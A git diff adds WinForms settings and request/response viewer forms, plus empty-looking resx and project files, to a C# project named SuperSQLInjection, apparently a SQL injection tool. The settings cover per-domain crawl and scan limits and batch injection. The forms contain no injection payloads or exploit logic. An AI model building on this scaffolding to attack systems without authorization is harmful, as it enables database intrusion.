+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/Seting.Designer.cs b/SuperSQLInjection/Seting.Designer.cs
new file mode 100644
index 0000000..4e1a507
--- /dev/null
+++ b/SuperSQLInjection/Seting.Designer.cs
@@ -0,0 +1,265 @@
+namespace SuperSQLInjection
+{
+ partial class Seting
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.groupBox1 = new System.Windows.Forms.GroupBox();
+ this.lbl_maxColumnsCount = new System.Windows.Forms.Label();
+ this.cob_maxClolumnsCount = new System.Windows.Forms.ComboBox();
+ this.chk_isAutoSaveConfig = new System.Windows.Forms.CheckBox();
+ this.chk_autoCheckUpdate = new System.Windows.Forms.CheckBox();
+ this.chk_mysqlMuStr = new System.Windows.Forms.CheckBox();
+ this.chk_openHTTPLog = new System.Windows.Forms.CheckBox();
+ this.chk_openInfoLog = new System.Windows.Forms.CheckBox();
+ this.label1 = new System.Windows.Forms.Label();
+ this.cob_oneDomainMaxSpiderCount = new System.Windows.Forms.ComboBox();
+ this.cob_oneDomainMaxScanCount = new System.Windows.Forms.ComboBox();
+ this.label2 = new System.Windows.Forms.Label();
+ this.groupBox2 = new System.Windows.Forms.GroupBox();
+ this.chk_redirectDoGet = new System.Windows.Forms.CheckBox();
+ this.groupBox1.SuspendLayout();
+ this.groupBox2.SuspendLayout();
+ this.SuspendLayout();
+ //
+ // groupBox1
+ //
+ this.groupBox1.Controls.Add(this.chk_redirectDoGet);
+ this.groupBox1.Controls.Add(this.lbl_maxColumnsCount);
+ this.groupBox1.Controls.Add(this.cob_maxClolumnsCount);
+ this.groupBox1.Controls.Add(this.chk_isAutoSaveConfig);
+ this.groupBox1.Controls.Add(this.chk_autoCheckUpdate);
+ this.groupBox1.Controls.Add(this.chk_mysqlMuStr);
+ this.groupBox1.Controls.Add(this.chk_openHTTPLog);
+ this.groupBox1.Controls.Add(this.chk_openInfoLog);
+ this.groupBox1.Location = new System.Drawing.Point(12, 12);
+ this.groupBox1.Name = "groupBox1";
+ this.groupBox1.Size = new System.Drawing.Size(487, 171);
+ this.groupBox1.TabIndex = 0;
+ this.groupBox1.TabStop = false;
+ this.groupBox1.Text = "系统配置";
+ //
+ // lbl_maxColumnsCount
+ //
+ this.lbl_maxColumnsCount.AutoSize = true;
+ this.lbl_maxColumnsCount.Location = new System.Drawing.Point(17, 89);
+ this.lbl_maxColumnsCount.Name = "lbl_maxColumnsCount";
+ this.lbl_maxColumnsCount.Size = new System.Drawing.Size(65, 12);
+ this.lbl_maxColumnsCount.TabIndex = 6;
+ this.lbl_maxColumnsCount.Text = "最大列数:";
+ //
+ // cob_maxClolumnsCount
+ //
+ this.cob_maxClolumnsCount.FormattingEnabled = true;
+ this.cob_maxClolumnsCount.Items.AddRange(new object[] {
+ "5",
+ "10",
+ "15",
+ "20",
+ "30",
+ "40",
+ "50",
+ "60",
+ "70",
+ "80",
+ "90",
+ "100",
+ "150",
+ "200"});
+ this.cob_maxClolumnsCount.Location = new System.Drawing.Point(88, 86);
+ this.cob_maxClolumnsCount.Name = "cob_maxClolumnsCount";
+ this.cob_maxClolumnsCount.Size = new System.Drawing.Size(70, 20);
+ this.cob_maxClolumnsCount.TabIndex = 5;
+ this.cob_maxClolumnsCount.SelectedValueChanged += new System.EventHandler(this.cob_maxClolumnsCount_SelectedValueChanged);
+ //
+ // chk_isAutoSaveConfig
+ //
+ this.chk_isAutoSaveConfig.AutoSize = true;
+ this.chk_isAutoSaveConfig.Location = new System.Drawing.Point(276, 88);
+ this.chk_isAutoSaveConfig.Name = "chk_isAutoSaveConfig";
+ this.chk_isAutoSaveConfig.Size = new System.Drawing.Size(144, 16);
+ this.chk_isAutoSaveConfig.TabIndex = 4;
+ this.chk_isAutoSaveConfig.Text = "软件关闭自动保存配置";
+ this.chk_isAutoSaveConfig.UseVisualStyleBackColor = true;
+ this.chk_isAutoSaveConfig.CheckedChanged += new System.EventHandler(this.chk_isAutoSaveConfig_CheckedChanged);
+ //
+ // chk_autoCheckUpdate
+ //
+ this.chk_autoCheckUpdate.AutoSize = true;
+ this.chk_autoCheckUpdate.Location = new System.Drawing.Point(276, 20);
+ this.chk_autoCheckUpdate.Name = "chk_autoCheckUpdate";
+ this.chk_autoCheckUpdate.Size = new System.Drawing.Size(120, 16);
+ this.chk_autoCheckUpdate.TabIndex = 1;
+ this.chk_autoCheckUpdate.Text = "开启自动检测更新";
+ this.chk_autoCheckUpdate.UseVisualStyleBackColor = true;
+ this.chk_autoCheckUpdate.CheckedChanged += new System.EventHandler(this.chk_autoCheckUpdate_CheckedChanged);
+ //
+ // chk_mysqlMuStr
+ //
+ this.chk_mysqlMuStr.AutoSize = true;
+ this.chk_mysqlMuStr.Location = new System.Drawing.Point(19, 20);
+ this.chk_mysqlMuStr.Name = "chk_mysqlMuStr";
+ this.chk_mysqlMuStr.Size = new System.Drawing.Size(150, 16);
+ this.chk_mysqlMuStr.TabIndex = 0;
+ this.chk_mysqlMuStr.Text = "开启MySQL多字节取数据";
+ this.chk_mysqlMuStr.UseVisualStyleBackColor = true;
+ this.chk_mysqlMuStr.CheckedChanged += new System.EventHandler(this.chk_mysqlMuStr_CheckedChanged);
+ //
+ // chk_openHTTPLog
+ //
+ this.chk_openHTTPLog.AutoSize = true;
+ this.chk_openHTTPLog.Location = new System.Drawing.Point(276, 51);
+ this.chk_openHTTPLog.Name = "chk_openHTTPLog";
+ this.chk_openHTTPLog.Size = new System.Drawing.Size(96, 16);
+ this.chk_openHTTPLog.TabIndex = 2;
+ this.chk_openHTTPLog.Text = "开启发包日志";
+ this.chk_openHTTPLog.UseVisualStyleBackColor = true;
+ this.chk_openHTTPLog.CheckedChanged += new System.EventHandler(this.chk_openHTTPLog_CheckedChanged);
+ //
+ // chk_openInfoLog
+ //
+ this.chk_openInfoLog.AutoSize = true;
+ this.chk_openInfoLog.Location = new System.Drawing.Point(19, 51);
+ this.chk_openInfoLog.Name = "chk_openInfoLog";
+ this.chk_openInfoLog.Size = new System.Drawing.Size(96, 16);
+ this.chk_openInfoLog.TabIndex = 1;
+ this.chk_openInfoLog.Text = "开启底部日志";
+ this.chk_openInfoLog.UseVisualStyleBackColor = true;
+ this.chk_openInfoLog.CheckedChanged += new System.EventHandler(this.chk_openInfoLog_CheckedChanged);
+ //
+ // label1
+ //
+ this.label1.AutoSize = true;
+ this.label1.Location = new System.Drawing.Point(17, 34);
+ this.label1.Name = "label1";
+ this.label1.Size = new System.Drawing.Size(113, 12);
+ this.label1.TabIndex = 8;
+ this.label1.Text = "单域名最大爬行数:";
+ //
+ // cob_oneDomainMaxSpiderCount
+ //
+ this.cob_oneDomainMaxSpiderCount.FormattingEnabled = true;
+ this.cob_oneDomainMaxSpiderCount.Items.AddRange(new object[] {
+ "3",
+ "5",
+ "10",
+ "15",
+ "20",
+ "30",
+ "40",
+ "50"});
+ this.cob_oneDomainMaxSpiderCount.Location = new System.Drawing.Point(136, 31);
+ this.cob_oneDomainMaxSpiderCount.Name = "cob_oneDomainMaxSpiderCount";
+ this.cob_oneDomainMaxSpiderCount.Size = new System.Drawing.Size(70, 20);
+ this.cob_oneDomainMaxSpiderCount.TabIndex = 7;
+ this.cob_oneDomainMaxSpiderCount.SelectedValueChanged += new System.EventHandler(this.cob_oneDomainMaxSpiderCount_SelectedValueChanged);
+ //
+ // cob_oneDomainMaxScanCount
+ //
+ this.cob_oneDomainMaxScanCount.FormattingEnabled = true;
+ this.cob_oneDomainMaxScanCount.Items.AddRange(new object[] {
+ "3",
+ "5",
+ "10",
+ "15",
+ "20"});
+ this.cob_oneDomainMaxScanCount.Location = new System.Drawing.Point(393, 31);
+ this.cob_oneDomainMaxScanCount.Name = "cob_oneDomainMaxScanCount";
+ this.cob_oneDomainMaxScanCount.Size = new System.Drawing.Size(70, 20);
+ this.cob_oneDomainMaxScanCount.TabIndex = 7;
+ this.cob_oneDomainMaxScanCount.SelectedValueChanged += new System.EventHandler(this.cob_oneDomainMaxScanCount_SelectedValueChanged);
+ //
+ // label2
+ //
+ this.label2.AutoSize = true;
+ this.label2.Location = new System.Drawing.Point(274, 34);
+ this.label2.Name = "label2";
+ this.label2.Size = new System.Drawing.Size(113, 12);
+ this.label2.TabIndex = 8;
+ this.label2.Text = "单域名最大扫描数:";
+ //
+ // groupBox2
+ //
+ this.groupBox2.Controls.Add(this.label2);
+ this.groupBox2.Controls.Add(this.label1);
+ this.groupBox2.Controls.Add(this.cob_oneDomainMaxScanCount);
+ this.groupBox2.Controls.Add(this.cob_oneDomainMaxSpiderCount);
+ this.groupBox2.Location = new System.Drawing.Point(12, 204);
+ this.groupBox2.Name = "groupBox2";
+ this.groupBox2.Size = new System.Drawing.Size(487, 75);
+ this.groupBox2.TabIndex = 9;
+ this.groupBox2.TabStop = false;
+ this.groupBox2.Text = "批量注入设置";
+ //
+ // chk_redirectDoGet
+ //
+ this.chk_redirectDoGet.AutoSize = true;
+ this.chk_redirectDoGet.Location = new System.Drawing.Point(19, 131);
+ this.chk_redirectDoGet.Name = "chk_redirectDoGet";
+ this.chk_redirectDoGet.Size = new System.Drawing.Size(126, 16);
+ this.chk_redirectDoGet.TabIndex = 7;
+ this.chk_redirectDoGet.Text = "重定向使用GET请求";
+ this.chk_redirectDoGet.UseVisualStyleBackColor = true;
+ this.chk_redirectDoGet.CheckedChanged += new System.EventHandler(this.chk_redirectDoGet_CheckedChanged);
+ //
+ // Seting
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(519, 300);
+ this.Controls.Add(this.groupBox2);
+ this.Controls.Add(this.groupBox1);
+ this.Name = "Seting";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "系统设置";
+ this.Shown += new System.EventHandler(this.Seting_Shown);
+ this.groupBox1.ResumeLayout(false);
+ this.groupBox1.PerformLayout();
+ this.groupBox2.ResumeLayout(false);
+ this.groupBox2.PerformLayout();
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.GroupBox groupBox1;
+ private System.Windows.Forms.CheckBox chk_mysqlMuStr;
+ private System.Windows.Forms.CheckBox chk_openInfoLog;
+ private System.Windows.Forms.CheckBox chk_openHTTPLog;
+ private System.Windows.Forms.CheckBox chk_autoCheckUpdate;
+ private System.Windows.Forms.CheckBox chk_isAutoSaveConfig;
+ private System.Windows.Forms.Label lbl_maxColumnsCount;
+ private System.Windows.Forms.ComboBox cob_maxClolumnsCount;
+ private System.Windows.Forms.Label label1;
+ private System.Windows.Forms.ComboBox cob_oneDomainMaxSpiderCount;
+ private System.Windows.Forms.ComboBox cob_oneDomainMaxScanCount;
+ private System.Windows.Forms.Label label2;
+ private System.Windows.Forms.GroupBox groupBox2;
+ private System.Windows.Forms.CheckBox chk_redirectDoGet;
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/Seting.cs b/SuperSQLInjection/Seting.cs
new file mode 100644
index 0000000..7a512a6
--- /dev/null
+++ b/SuperSQLInjection/Seting.cs
@@ -0,0 +1,82 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection
+{
+ public partial class Seting : Form
+ {
+ public Seting(Main main)
+ {
+ InitializeComponent();
+ this.main = main;
+ }
+
+ private Main main = null;
+
+ private void chk_mysqlMuStr_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isMuStr = this.chk_mysqlMuStr.Checked;
+ }
+
+ private void chk_openInfoLog_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isOpenInfoLog = this.chk_openInfoLog.Checked;
+ }
+
+ private void chk_openHTTPLog_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isOpenHTTPLog = this.chk_openHTTPLog.Checked;
+ }
+
+ private void chk_autoCheckUpdate_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isAutoCheckUpdate = this.chk_autoCheckUpdate.Checked;
+ }
+
+
+
+ private void chk_isAutoSaveConfig_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.isSavaConfigWhenClose = this.chk_isAutoSaveConfig.Checked;
+ }
+
+ private void Seting_Shown(object sender, EventArgs e)
+ {
+ this.chk_openHTTPLog.Checked = main.config.isOpenHTTPLog;
+ this.chk_openInfoLog.Checked = main.config.isOpenInfoLog;
+ this.chk_mysqlMuStr.Checked = main.config.isMuStr;
+ this.chk_autoCheckUpdate.Checked = main.config.isAutoCheckUpdate;
+ this.chk_isAutoSaveConfig.Checked = main.config.isSavaConfigWhenClose;
+ this.cob_maxClolumnsCount.Text = main.config.maxClolumns.ToString();
+ this.cob_oneDomainMaxSpiderCount.Text = main.config.maxSpiderCount.ToString();
+ this.cob_oneDomainMaxScanCount.Text = main.config.maxScanCount.ToString();
+ this.chk_redirectDoGet.Checked=main.config.redirectDoGet;
+
+ }
+
+ private void cob_maxClolumnsCount_SelectedValueChanged(object sender, EventArgs e)
+ {
+ main.config.maxClolumns = int.Parse(this.cob_maxClolumnsCount.Text);
+ }
+
+ private void cob_oneDomainMaxSpiderCount_SelectedValueChanged(object sender, EventArgs e)
+ {
+ main.config.maxSpiderCount = int.Parse(this.cob_oneDomainMaxSpiderCount.Text);
+ }
+
+ private void cob_oneDomainMaxScanCount_SelectedValueChanged(object sender, EventArgs e)
+ {
+ main.config.maxScanCount = int.Parse(this.cob_oneDomainMaxScanCount.Text);
+ }
+
+ private void chk_redirectDoGet_CheckedChanged(object sender, EventArgs e)
+ {
+ main.config.redirectDoGet = this.chk_redirectDoGet.Checked;
+ }
+ }
+}
diff --git a/SuperSQLInjection/Seting.resx b/SuperSQLInjection/Seting.resx
new file mode 100644
index 0000000..1af7de1
--- /dev/null
+++ b/SuperSQLInjection/Seting.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/ShowResponse.Designer.cs b/SuperSQLInjection/ShowResponse.Designer.cs
new file mode 100644
index 0000000..eba488c
--- /dev/null
+++ b/SuperSQLInjection/ShowResponse.Designer.cs
@@ -0,0 +1,239 @@
+namespace SuperSQLInjection
+{
+ partial class ShowResponse
+ {
+ ///
+ /// Required designer variable.
+ ///
+ private System.ComponentModel.IContainer components = null;
+
+ ///
+ /// Clean up any resources being used.
+ ///
+ /// true if managed resources should be disposed; otherwise, false.
+ protected override void Dispose(bool disposing)
+ {
+ if (disposing && (components != null))
+ {
+ components.Dispose();
+ }
+ base.Dispose(disposing);
+ }
+
+ #region Windows Form Designer generated code
+
+ ///
+ /// Required method for Designer support - do not modify
+ /// the contents of this method with the code editor.
+ ///
+ private void InitializeComponent()
+ {
+ this.tabPage3 = new System.Windows.Forms.TabPage();
+ this.tab_showInBrowser = new System.Windows.Forms.TabControl();
+ this.tabPage4 = new System.Windows.Forms.TabPage();
+ this.txt_responseBody = new System.Windows.Forms.TextBox();
+ this.tabPage5 = new System.Windows.Forms.TabPage();
+ this.webBrowser1 = new System.Windows.Forms.WebBrowser();
+ this.tabPage1 = new System.Windows.Forms.TabPage();
+ this.txt_requestHeader = new System.Windows.Forms.TextBox();
+ this.tab_requestBody = new System.Windows.Forms.TabControl();
+ this.tabPage6 = new System.Windows.Forms.TabPage();
+ this.txt_requestBody = new System.Windows.Forms.TextBox();
+ this.tabPage2 = new System.Windows.Forms.TabPage();
+ this.txt_responseHeader = new System.Windows.Forms.TextBox();
+ this.tabPage3.SuspendLayout();
+ this.tab_showInBrowser.SuspendLayout();
+ this.tabPage4.SuspendLayout();
+ this.tabPage5.SuspendLayout();
+ this.tabPage1.SuspendLayout();
+ this.tab_requestBody.SuspendLayout();
+ this.tabPage6.SuspendLayout();
+ this.tabPage2.SuspendLayout();
+ this.SuspendLayout();
+ //
+ // tabPage3
+ //
+ this.tabPage3.Controls.Add(this.tab_showInBrowser);
+ this.tabPage3.Location = new System.Drawing.Point(4, 22);
+ this.tabPage3.Name = "tabPage3";
+ this.tabPage3.Size = new System.Drawing.Size(663, 415);
+ this.tabPage3.TabIndex = 2;
+ this.tabPage3.Text = "Response Body";
+ this.tabPage3.UseVisualStyleBackColor = true;
+ //
+ // tab_showInBrowser
+ //
+ this.tab_showInBrowser.Controls.Add(this.tabPage4);
+ this.tab_showInBrowser.Controls.Add(this.tabPage5);
+ this.tab_showInBrowser.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tab_showInBrowser.Location = new System.Drawing.Point(0, 0);
+ this.tab_showInBrowser.Name = "tab_showInBrowser";
+ this.tab_showInBrowser.SelectedIndex = 0;
+ this.tab_showInBrowser.Size = new System.Drawing.Size(663, 415);
+ this.tab_showInBrowser.TabIndex = 1;
+ //
+ // tabPage4
+ //
+ this.tabPage4.Controls.Add(this.txt_responseBody);
+ this.tabPage4.Location = new System.Drawing.Point(4, 22);
+ this.tabPage4.Name = "tabPage4";
+ this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage4.Size = new System.Drawing.Size(655, 389);
+ this.tabPage4.TabIndex = 0;
+ this.tabPage4.Text = "查看文本Text";
+ this.tabPage4.UseVisualStyleBackColor = true;
+ //
+ // txt_responseBody
+ //
+ this.txt_responseBody.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.txt_responseBody.Location = new System.Drawing.Point(3, 3);
+ this.txt_responseBody.MaxLength = 10000000;
+ this.txt_responseBody.Multiline = true;
+ this.txt_responseBody.Name = "txt_responseBody";
+ this.txt_responseBody.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.txt_responseBody.Size = new System.Drawing.Size(649, 383);
+ this.txt_responseBody.TabIndex = 0;
+ this.txt_responseBody.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_responseBody_KeyDown);
+ //
+ // tabPage5
+ //
+ this.tabPage5.Controls.Add(this.webBrowser1);
+ this.tabPage5.Location = new System.Drawing.Point(4, 22);
+ this.tabPage5.Name = "tabPage5";
+ this.tabPage5.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage5.Size = new System.Drawing.Size(655, 389);
+ this.tabPage5.TabIndex = 1;
+ this.tabPage5.Text = "在浏览器中显示";
+ this.tabPage5.UseVisualStyleBackColor = true;
+ //
+ // webBrowser1
+ //
+ this.webBrowser1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.webBrowser1.Location = new System.Drawing.Point(3, 3);
+ this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20);
+ this.webBrowser1.Name = "webBrowser1";
+ this.webBrowser1.Size = new System.Drawing.Size(649, 383);
+ this.webBrowser1.TabIndex = 0;
+ //
+ // tabPage1
+ //
+ this.tabPage1.Controls.Add(this.txt_requestHeader);
+ this.tabPage1.Location = new System.Drawing.Point(4, 22);
+ this.tabPage1.Name = "tabPage1";
+ this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage1.Size = new System.Drawing.Size(663, 415);
+ this.tabPage1.TabIndex = 0;
+ this.tabPage1.Text = "Request Header";
+ this.tabPage1.UseVisualStyleBackColor = true;
+ //
+ // txt_requestHeader
+ //
+ this.txt_requestHeader.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.txt_requestHeader.Location = new System.Drawing.Point(3, 3);
+ this.txt_requestHeader.MaxLength = 10000000;
+ this.txt_requestHeader.Multiline = true;
+ this.txt_requestHeader.Name = "txt_requestHeader";
+ this.txt_requestHeader.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.txt_requestHeader.Size = new System.Drawing.Size(657, 409);
+ this.txt_requestHeader.TabIndex = 1;
+ //
+ // tab_requestBody
+ //
+ this.tab_requestBody.Controls.Add(this.tabPage1);
+ this.tab_requestBody.Controls.Add(this.tabPage6);
+ this.tab_requestBody.Controls.Add(this.tabPage2);
+ this.tab_requestBody.Controls.Add(this.tabPage3);
+ this.tab_requestBody.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.tab_requestBody.Location = new System.Drawing.Point(0, 0);
+ this.tab_requestBody.Name = "tab_requestBody";
+ this.tab_requestBody.SelectedIndex = 0;
+ this.tab_requestBody.Size = new System.Drawing.Size(671, 441);
+ this.tab_requestBody.TabIndex = 0;
+ //
+ // tabPage6
+ //
+ this.tabPage6.Controls.Add(this.txt_requestBody);
+ this.tabPage6.Location = new System.Drawing.Point(4, 22);
+ this.tabPage6.Name = "tabPage6";
+ this.tabPage6.Size = new System.Drawing.Size(663, 415);
+ this.tabPage6.TabIndex = 3;
+ this.tabPage6.Text = "Request Body";
+ this.tabPage6.UseVisualStyleBackColor = true;
+ //
+ // txt_requestBody
+ //
+ this.txt_requestBody.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.txt_requestBody.Location = new System.Drawing.Point(0, 0);
+ this.txt_requestBody.MaxLength = 10000000;
+ this.txt_requestBody.Multiline = true;
+ this.txt_requestBody.Name = "txt_requestBody";
+ this.txt_requestBody.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.txt_requestBody.Size = new System.Drawing.Size(663, 415);
+ this.txt_requestBody.TabIndex = 1;
+ //
+ // tabPage2
+ //
+ this.tabPage2.Controls.Add(this.txt_responseHeader);
+ this.tabPage2.Location = new System.Drawing.Point(4, 22);
+ this.tabPage2.Name = "tabPage2";
+ this.tabPage2.Padding = new System.Windows.Forms.Padding(3);
+ this.tabPage2.Size = new System.Drawing.Size(663, 415);
+ this.tabPage2.TabIndex = 1;
+ this.tabPage2.Text = "Response Header";
+ this.tabPage2.UseVisualStyleBackColor = true;
+ //
+ // txt_responseHeader
+ //
+ this.txt_responseHeader.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.txt_responseHeader.Location = new System.Drawing.Point(3, 3);
+ this.txt_responseHeader.MaxLength = 10000000;
+ this.txt_responseHeader.Multiline = true;
+ this.txt_responseHeader.Name = "txt_responseHeader";
+ this.txt_responseHeader.ScrollBars = System.Windows.Forms.ScrollBars.Both;
+ this.txt_responseHeader.Size = new System.Drawing.Size(657, 409);
+ this.txt_responseHeader.TabIndex = 0;
+ //
+ // ShowResponse
+ //
+ this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
+ this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
+ this.ClientSize = new System.Drawing.Size(671, 441);
+ this.Controls.Add(this.tab_requestBody);
+ this.Name = "ShowResponse";
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
+ this.Text = "请求响应";
+ this.Shown += new System.EventHandler(this.ShowResponse_Shown);
+ this.tabPage3.ResumeLayout(false);
+ this.tab_showInBrowser.ResumeLayout(false);
+ this.tabPage4.ResumeLayout(false);
+ this.tabPage4.PerformLayout();
+ this.tabPage5.ResumeLayout(false);
+ this.tabPage1.ResumeLayout(false);
+ this.tabPage1.PerformLayout();
+ this.tab_requestBody.ResumeLayout(false);
+ this.tabPage6.ResumeLayout(false);
+ this.tabPage6.PerformLayout();
+ this.tabPage2.ResumeLayout(false);
+ this.tabPage2.PerformLayout();
+ this.ResumeLayout(false);
+
+ }
+
+ #endregion
+
+ private System.Windows.Forms.TabPage tabPage3;
+ private System.Windows.Forms.TabControl tab_showInBrowser;
+ private System.Windows.Forms.TabPage tabPage4;
+ private System.Windows.Forms.TextBox txt_responseBody;
+ private System.Windows.Forms.TabPage tabPage5;
+ private System.Windows.Forms.WebBrowser webBrowser1;
+ private System.Windows.Forms.TabPage tabPage1;
+ private System.Windows.Forms.TabControl tab_requestBody;
+ private System.Windows.Forms.TabPage tabPage6;
+ private System.Windows.Forms.TabPage tabPage2;
+ private System.Windows.Forms.TextBox txt_responseHeader;
+ private System.Windows.Forms.TextBox txt_requestHeader;
+ private System.Windows.Forms.TextBox txt_requestBody;
+
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/ShowResponse.cs b/SuperSQLInjection/ShowResponse.cs
new file mode 100644
index 0000000..8fbd329
--- /dev/null
+++ b/SuperSQLInjection/ShowResponse.cs
@@ -0,0 +1,43 @@
+using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Data;
+using System.Drawing;
+using System.Text;
+using System.Windows.Forms;
+using model;
+
+namespace SuperSQLInjection
+{
+ public partial class ShowResponse : Form
+ {
+ public ShowResponse()
+ {
+ InitializeComponent();
+ }
+
+ public ServerInfo server = new ServerInfo();
+
+ private void ShowResponse_Shown(object sender, EventArgs e)
+ {
+ this.txt_requestHeader.Text = this.server.reuqestHeader;
+ this.txt_requestBody.Text = this.server.reuqestBody;
+ this.txt_responseHeader.Text = this.server.header;
+ this.txt_responseBody.Text = this.server.body;
+
+ this.webBrowser1.ScriptErrorsSuppressed = true;
+ this.webBrowser1.DocumentText = this.server.body;
+ }
+
+ private void txt_responseBody_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F)
+ {
+ FindString fs = new FindString();
+ fs.txtbox = this.txt_responseBody;
+ fs.Show();
+ }
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/ShowResponse.resx b/SuperSQLInjection/ShowResponse.resx
new file mode 100644
index 0000000..1af7de1
--- /dev/null
+++ b/SuperSQLInjection/ShowResponse.resx
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/SuperSQLInjection.csproj b/SuperSQLInjection/SuperSQLInjection.csproj
new file mode 100644
index 0000000..7f6138c
--- /dev/null
+++ b/SuperSQLInjection/SuperSQLInjection.csproj
@@ -0,0 +1,234 @@
+
+
+
+ Debug
+ x86
+ 8.0.30703
+ 2.0
+ {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}
+ WinExe
+ Properties
+ SuperSQLInjection
+ SuperSQLInjection
+ v4.0
+
+
+ 512
+ false
+ 发布\
+ true
+ Disk
+ false
+ Foreground
+ 7
+ Days
+ false
+ false
+ true
+ 1
+ 2016.01.18.%2a
+ false
+ true
+ true
+
+
+ x86
+ true
+ full
+ false
+ bin\Debug\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ x86
+ pdbonly
+ true
+ bin\Release\
+ TRACE
+ prompt
+ 4
+
+
+ false
+
+
+ 0661C2B7EEEC92022E280547613647A17F8A3715
+
+
+ SuperSQLInjection_TemporaryKey.pfx
+
+
+ true
+
+
+ LocalIntranet
+
+
+ Properties\app.manifest
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Form
+
+
+ About.cs
+
+
+ Form
+
+
+ AddNode.cs
+
+
+
+ Form
+
+
+ FindString.cs
+
+
+ Form
+
+
+ Main.cs
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Form
+
+
+ ProgressBar.cs
+
+
+
+
+ Form
+
+
+ Seting.cs
+
+
+ Form
+
+
+ ShowResponse.cs
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Form
+
+
+ Waring.cs
+
+
+ About.cs
+
+
+ AddNode.cs
+
+
+ FindString.cs
+
+
+ Main.cs
+
+
+ ProgressBar.cs
+
+
+ ResXFileCodeGenerator
+ Resources.Designer.cs
+ Designer
+
+
+ True
+ Resources.resx
+ True
+
+
+ Seting.cs
+
+
+ ShowResponse.cs
+
+
+ Waring.cs
+
+
+
+
+ SettingsSingleFileGenerator
+ Settings.Designer.cs
+
+
+ True
+ Settings.settings
+ True
+
+
+
+
+
+ False
+ .NET Framework 3.5 SP1 Client Profile
+ false
+
+
+ False
+ .NET Framework 3.5 SP1
+ true
+
+
+
+
+
\ No newline at end of file
diff --git a/SuperSQLInjection/WARING~1.RES b/SuperSQLInjection/WARING~1.RES
new file mode 100644
index 0000000..7080a7d
--- /dev/null
+++ b/SuperSQLInjection/WARING~1.RES
@@ -0,0 +1,120 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
